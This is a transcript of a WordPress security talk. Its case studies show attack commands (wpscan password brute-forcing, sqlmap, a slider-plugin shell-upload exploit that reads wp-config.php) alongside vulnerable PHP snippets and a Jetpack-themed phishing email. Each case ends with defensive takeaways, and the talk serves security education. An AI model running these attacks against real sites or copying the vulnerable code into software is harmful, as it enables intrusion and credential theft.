Come to the dark side

Transcript

1. TIM NASH @tnash Come to the dark side They have

   cookies...
 Extended Edition!

2. Police & Justice act 2006 "Unauthorised acts with intent to

   impair, or with recklessness as to impairing, operation of computer, etc"
3. None
4. None

5. Client email Hi, we are going to be on the

   One Show in about two hours. Do you need to do anything?

6. ruby wpscan.rb --url

7. Intelligence gathering is fun!

8. Look mom I can hack stuff!

9. Totally legit... function df_save_options() { $fields = $_REQUEST; foreach($fields as

   $key => $field) { if($key!="action") { echo $key."-".$field; update_option($key,$field); } } die(); }
10. None
11. None

12. WordPress Platform Lead 
 at 34SP.com Former Pen Tester co-run

    WordPress Leeds Ran a small dev agency Speaks about security 
 around the country

13. Take aways from TV wonder Use a child theme Regularly

    code audit Have control of your WAF Get a disaster plan in place

14. Magazine Hack

15. Small print firm moved online Mom and Pop shop
 Uses

    a single WordPress site Shared hosting
 No in house "dev" team

16. /wp/wp-json/v2/users

17. ruby wpscan.rb --url magazine-company.com 
 --wordlist timspassword.dict --username admin

18. ruby wpscan.rb --url magazine-company.com 
 --enumerate p

19. [+] Name: jetpack - v6.3.2 | Latest version: 6.3.2 (up

    to date) | Last updated: 2018-07-04T10:01:00.000Z | Location: https://magazine.com/wp-content/plugins/jetpack/ | Readme: https://magazine.com/wp-content/plugins/jetpack/ readme.txt | Changelog: https://magazine.com/wp-content/plugins/jetpack/ changelog.txt

20. [+] Name: jetpack - v6.3.2 | Latest version: 6.3.2 (up

    to date) | Last updated: 2018-07-04T10:01:00.000Z | Location: https://magazine.com/wp-content/plugins/jetpack/ | Readme: https://magazine.com/wp-content/plugins/jetpack/ readme.txt | Changelog: https://magazine.com/wp-content/plugins/jetpack/ changelog.txt
21. None
22. None

23. 6eefb55db48f21dde991e2694dda58fd 
 ==
 [email protected] ???

24. Typical WordPress update email

25. Please update your site at http://timstest.ismysite.co.uk to WordPress 4.9.7. Updating

    is easy and only takes a few moments: http://timstest.ismysite.co.uk/wp/wp-admin/update- core.php If you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help. https://wordpress.org/support/ Keeping your site updated is important for security. It also makes the internet a safer place for you and your readers. The WordPress Team

26. Please update your site at timstest.ismysite.co.uk to WordPress 4.9.7. Updating

    with Jetpack installed is easy and only takes a few moments: https://jetpack-wordpress.com/update/ timstest.isymsite.co.uk If you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help. https://wordpress.org/support/ Keeping your site updated is important for security. It also makes the internet a safer place for you and your readers. The WordPress Team

27. Friendly familiar login.... Pre populated username whats
 missing?

28. The actual wp.com login

29. >> From: WordPress.com <[email protected]> >> Date: 21 September 2018 at

    05:18:53 BST >> To: [email protected] >> Subject: wordpress database upgrade required ! >> >> >> >> DataBase Upgrade Required >> >> Dear Customer, >> >> Your WordPress database is out-of-date, and must be upgrade before 29/09/2018. >> >> The upgrade process may take a while, so please be patient. >> >> Click here to Upgrade Wordpress >> >> >> Download our free mobile app today. >> View stats, moderate comments, create and edit posts, and upload media. >> Click here to learn more. >> Automattic Inc. | 60 29th St. #343, San Francisco, CA 94110

30. Take aways from our spear phishing attack Never click untrusted

    links Enable two-factor authentication Limit administrator users Don't use the same password on ever site
31. None

32. Charity Hack

33. Watford Children Charity Separated Brochure site Sharepoint/Exchange Server on site

    IT Manager 3rd party developers for site
34. None

35. use exploit/shell/divi_revslider_shell_upload
 set watfordcharity.com
 set payload exec
 set cmd cat

    wp-config.php

36. <?php .... // ** MySQL settings ** // /** The

    name of the database for WordPress */ define( 'DB_NAME', 'watford' ); /** MySQL database username */ define( 'DB_USER', 'watford' ); /** MySQL database password */ define( 'DB_PASSWORD', 'totallysecure' ); /** MySQL hostname */ define( 'DB_HOST', 'db.watfordcharity.com' );

37. set cmd "ls wp-content/plugins"

38. Take aways from our slider attack Always keep things up

    to date Never rely on themes licenses to get bundled plugins The DB is not a safe place to store credentials

39. E-Commerce Site Hack

40. E-commerce site hack WooCommerce Powered Hop 100s of customers Small

    Dev Team Custom Theme and a range of plugins

41. https:// ecommerceexample.com/ wp-content/themes/custom/ dcss.php?id=1

42. python sqlmap.py -u https:// ecommerceexample.com/ wp-content/themes/custom/ dcss.php?id=1

43. <?php .... define('SHORTINIT', true); // load minimal WordPress require_once '../../../wp-load.php';

    // WordPress loader

44. <?php .... $result = $wpdb->query("SELECT * FROM `{$tablename}` where `css_source`={$id}");

45. <?php .... $id = $_GET['ID']

46. None

47. a:1:{s:13:"administrator";b:1;}

48. Take aways from our SQL attack Custom Code is our

    responsibility Never Rely on a WAF thats in the application Separate your file integrity checks where possible.

49. Back to TV wonder

50. What if there was an exploit that hasn't been discovered?

51. OWASP ZAP

52. Burp Suite

53. Take aways from our TV wonder (Part 2) Make use

    of HTTP Headers and CSP Regularly scan your own sites. Automate updates? Automate scanning Use SQLMap during Development PHPStan, could save us!

54. Best way to get started? https://www.kali.org

55. Tools used... wpscan linkedint WPEXF OWASP ZAP BurpSuite SQL MAP

56. None

57. TIM NASH @tnash | timnash.co.uk/security Thank you very much!